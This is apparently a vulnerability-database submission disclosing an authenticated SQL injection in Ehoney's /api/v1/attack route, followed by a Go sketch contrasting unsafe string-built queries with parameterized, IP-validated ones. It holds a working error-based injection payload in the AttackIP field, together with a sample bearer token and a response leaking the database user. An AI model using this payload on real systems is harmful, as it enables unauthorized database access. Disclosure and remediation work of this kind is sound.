| Title | Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack route |
|---|---|
| User | Anonymous User |
| Submission | 26/10/2022 03:44 (3 years ago) |
| Moderated | 28/10/2022 07:26 (2 days later) |
| Status | Accepted |
| VulDB entry | 212411 [seccome Ehoney /api/v1/attack AttackIP SQL injection] |
| Points | 17 |

Description:

repo: https://github.com/seccome/Ehoney

## request

```http
POST /api/v1/attack HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo
Content-Length: 211
Content-Type: application/json
Host: x.x.x.x:8080

{
  "Payload": "",
  "AttackIP": "' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #",
  "ProbeIP": "",
  "JumpIP": "",
  "HoneypotIP": "",
  "ProtocolType": "",
  "PageNumber": 1,
  "PageSize": 1
}
```

## response

```json
{
  "code": 1006,
  "msg": "数据库异常",
  "data": "Error 1105: XPATH syntax error: '[email protected]~'; Error 1105: XPATH syntax error: '[email protected]~'"
}
```

## affected code

https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/attack.go#L35
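As an added illustration (not Ehoney's code; the query at models/attack.go#L35 is not reproduced here), the Go below contrasts a hypothetical filter builder that splices the AttackIP/ProbeIP/HoneypotIP fields into SQL text, which is the bug class of this report, with a hardened builder that validates each field with net.ParseIP and hands the values over as bound arguments to a placeholder clause.

```go
package main

import (
	"fmt"
	"net"
	"strings"
)

// AttackFilter carries the IP filter fields of the POST /api/v1/attack body
// shown in the report (hypothetical struct; field names taken from the request).
type AttackFilter struct {
	AttackIP, ProbeIP, HoneypotIP string
}

// ipFields lists the (column, value) pairs in a fixed order (column names assumed).
func ipFields(f AttackFilter) []struct{ col, val string } {
	return []struct{ col, val string }{
		{"attack_ip", f.AttackIP}, {"probe_ip", f.ProbeIP}, {"honeypot_ip", f.HoneypotIP},
	}
}

// unsafeWhere splices the fields into SQL text. This is the bug class in the
// report: the quote in AttackIP closes the literal and the rest runs as SQL.
func unsafeWhere(f AttackFilter) string {
	var parts []string
	for _, c := range ipFields(f) {
		if c.val != "" {
			parts = append(parts, c.col+" = '"+c.val+"'")
		}
	}
	return strings.Join(parts, " AND ")
}

// safeWhere keeps user input out of the SQL text: each field must parse as an
// IP literal, and values travel as bound args for a '?' placeholder clause
// (the shape gorm's db.Where(clause, args...) expects).
func safeWhere(f AttackFilter) (clause string, args []any, err error) {
	var parts []string
	for _, c := range ipFields(f) {
		if c.val == "" {
			continue // empty filter fields are simply not applied
		}
		if net.ParseIP(c.val) == nil {
			return "", nil, fmt.Errorf("%s: %q is not an IP address", c.col, c.val)
		}
		parts = append(parts, c.col+" = ?")
		args = append(args, c.val)
	}
	return strings.Join(parts, " AND "), args, nil
}

func main() {
	// Constructed from the AttackIP value in the report above.
	bad := AttackFilter{AttackIP: "' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #"}
	fmt.Println("unsafe:", unsafeWhere(bad))
	if _, _, err := safeWhere(bad); err != nil {
		fmt.Println("safe: rejected:", err)
	}
	clause, args, _ := safeWhere(AttackFilter{AttackIP: "10.0.0.5", ProbeIP: "192.0.2.7"})
	fmt.Println("safe:", clause, args)
}
```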